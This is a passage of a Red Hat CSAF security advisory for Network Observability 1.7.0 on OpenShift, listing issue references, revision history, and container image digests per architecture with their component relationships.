url: "https://issues.redhat.com/browse/NETOBSERV-1783", }, { category: "external", summary: "NETOBSERV-1788", url: "https://issues.redhat.com/browse/NETOBSERV-1788", }, { category: "external", summary: "NETOBSERV-1798", url: "https://issues.redhat.com/browse/NETOBSERV-1798", }, { category: "external", summary: "NETOBSERV-1805", url: "https://issues.redhat.com/browse/NETOBSERV-1805", }, { category: "external", summary: "NETOBSERV-1806", url: "https://issues.redhat.com/browse/NETOBSERV-1806", }, { category: "external", summary: "NETOBSERV-1808", url: "https://issues.redhat.com/browse/NETOBSERV-1808", }, { category: "external", summary: "NETOBSERV-1811", url: "https://issues.redhat.com/browse/NETOBSERV-1811", }, { category: "external", summary: "NETOBSERV-1812", url: "https://issues.redhat.com/browse/NETOBSERV-1812", }, { category: "external", summary: "NETOBSERV-1813", url: "https://issues.redhat.com/browse/NETOBSERV-1813", }, { category: "external", summary: "NETOBSERV-1816", url: "https://issues.redhat.com/browse/NETOBSERV-1816", }, { category: "external", summary: "NETOBSERV-1819", url: "https://issues.redhat.com/browse/NETOBSERV-1819", }, { category: "external", summary: "NETOBSERV-1848", url: "https://issues.redhat.com/browse/NETOBSERV-1848", }, { category: "external", summary: "NETOBSERV-1884", url: "https://issues.redhat.com/browse/NETOBSERV-1884", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8014.json", }, ], title: "Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift", tracking: { current_release_date: "2025-04-10T05:32:11+00:00", generator: { date: "2025-04-10T05:32:11+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:8014", initial_release_date: "2024-10-22T01:05:39+00:00", revision_history: [ { date: "2024-10-22T01:05:39+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-22T01:05:39+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T05:32:11+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "NETOBSERV 1.7 for RHEL 9", product: { name: "NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0", product_identification_helper: { cpe: "cpe:/a:redhat:network_observ_optr:1.7.0::el9", }, }, }, ], category: "product_family", name: "Network Observability", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", product: { name: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", product_id: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", product: { name: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", product_id: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", product: { name: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", product_id: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba?arch=amd64&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", product: { name: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", product_id: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", product: { name: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", product_id: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", product: { name: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", product_id: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a?arch=ppc64le&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", product: { name: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", product_id: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", product: { name: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", product_id: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", product: { name: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", product_id: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", product: { name: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", product_id: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", product: { name: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", product_id: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", product: { name: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", product_id: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "s390x", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: 